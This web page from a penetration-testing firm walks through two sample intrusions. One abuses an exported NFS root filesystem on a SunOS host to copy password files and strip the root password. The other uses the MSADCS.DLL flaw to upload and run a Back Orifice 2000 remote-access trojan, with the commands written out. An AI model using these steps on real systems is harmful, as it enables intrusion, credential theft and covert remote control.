PENETRATION TESTING - PROOF OF CONCEPT
 

[Introduction] [Vulnerability ex1] [Vulnerability ex2] [Port Map] [Graphics] [Proof of Concept] [Report Key] [Exploit Code]

 

Sample Intrusion Methodologies
 
First we examine host FOO, a UNIX machine running SUNOS 5.4. Text in bold represents hacker input, text in italic represents target responses. Text in { } is explanatory commentary.

From the local Linux prompt:

# showmount -e foo

Export list for foo:

filesystem restrictions

/ everyone
/usr everyone
/usr/local everyone
/var everyone
/disk3 everyone

{The root filesystem is being exported to Everyone, on the Internet this really does mean EVERYONE}

# mkdir /foo {create a local mount point}
# mount foo:/ /foo {mount the root filesystem on foo to a local directory}
# cd /foo/etc {we now have direct access to foo's system files}
# cp shadow /
# cp passwd /
{copy foo's password files to our local machine for cracking, this is not required as we already have complete access to foo, but some of the password's may exist on other machines on the remote network}
# cp shadow shad.backup {make a backup of the remote password file}
# vi shadow {open the shadowed password file with a standard editor and remove the password hash for root}

# telnet foo

Foo - SUNOS 5.4

login: root {login to foo as root}

Welcome to foo. {no password required, the hacker is now free to install whatever backdoors/trojans/rootkits he desires and has full administrative access to this machine}

# logout {logout of foo}
# rm /foo/etc/shadow {delete compromised password file}
# cp /foo/etc/shad.backup /foo/etc/shadow {restore genuine password file}
# umount /foo {unmount remote filesystem, game over.........}


Next we examine the NT host, BAR. There is a serious vulnerability on this host referenced in the report as MSADCS.DLL. This will allow a hacker to execute remote commands and upload files to this system. Our plan will be to upload and execute a remote access trojan (Back Orifice 2000), to give us complete and unrestricted access to the target filesystem as well capture keystrokes, monitor user input and hijack the keyboard and mouse. The trojan will be called monitor.exe and will be Windows executable code, though the exploit will be carried out from a Linux machine. This exploit will use the easily acquirable hacker programs: msadc-trojan_pl & msadc2_pl, both of which are written in perl. The source is included in the appendices.

From the Linux prompt:

# echo "+ +" > .rhosts {slight modification to local system config}
# ./msadc-trojan.pl bar  12.34.12.34 monitor.exe {upload and execute trojan using remote and local IPs}

Now all is required is to connect to remote trojan using the BO2K client. A trivial exploit, but it allows complete access, once again game over.........

 

Please read our instructions before sending files or payments.

 
 
The information on this web site is protected by copyright.  Except as specifically permitted, no portion of this web site  may be distributed or reproduced by any means, or in any form,  without Password Crackers, Inc.'s prior written permission.   2012 Password Crackers, Inc., USA. All rights reserved.